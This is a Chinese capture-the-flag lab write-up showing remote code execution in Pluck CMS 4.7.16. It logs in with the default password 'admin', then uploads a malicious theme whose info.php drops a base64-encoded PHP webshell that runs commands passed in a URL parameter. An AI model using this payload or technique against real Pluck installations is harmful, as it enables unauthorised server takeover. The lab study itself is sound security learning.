#简介
原文链接:culturesun.site/index.php/a…
是一个CMS系统----Pluck-CMS-Pluck-4.7.16
的后台RCE漏洞。
本人使用春秋云境免费靶场在线搭建。
#详解
- 打开首页,发现下面有两个按钮可以点,其中一个应该是后台登录按钮
- 点击
admin
,果然跳转到了登录页面,只有密码框,输入admin
,登录成功,惊呆了老铁!!! - 上图是管理界面,随便点点,发现一个上传图片和上传文件的入口,尝试了一下,无法获得shell
- 又发现一个可以上传主题入口,需要上传zip压缩文件。
- github找了个开源主题,阅读源码,发现安装主题会读取并执行主题中
info.php
。修改info.php
代码。
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+'));
?>
file_put_contents() 是 PHP 中的一个函数,用于将一个字符串写入文件中。
6. 上传成功后,切换主题并保存。
7. 首页访问
shell.php
文件,cmd
参数传入cat /falg
获取falg。
http://eci-2ze55xp3m6rd9j75pecz.cloudeci1.ichunqiu.com/shell.php?cmd=cat%20/flag
#结语
我加入了腾讯云自媒体分享计划
,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:cloud.tencent.com/developer/s…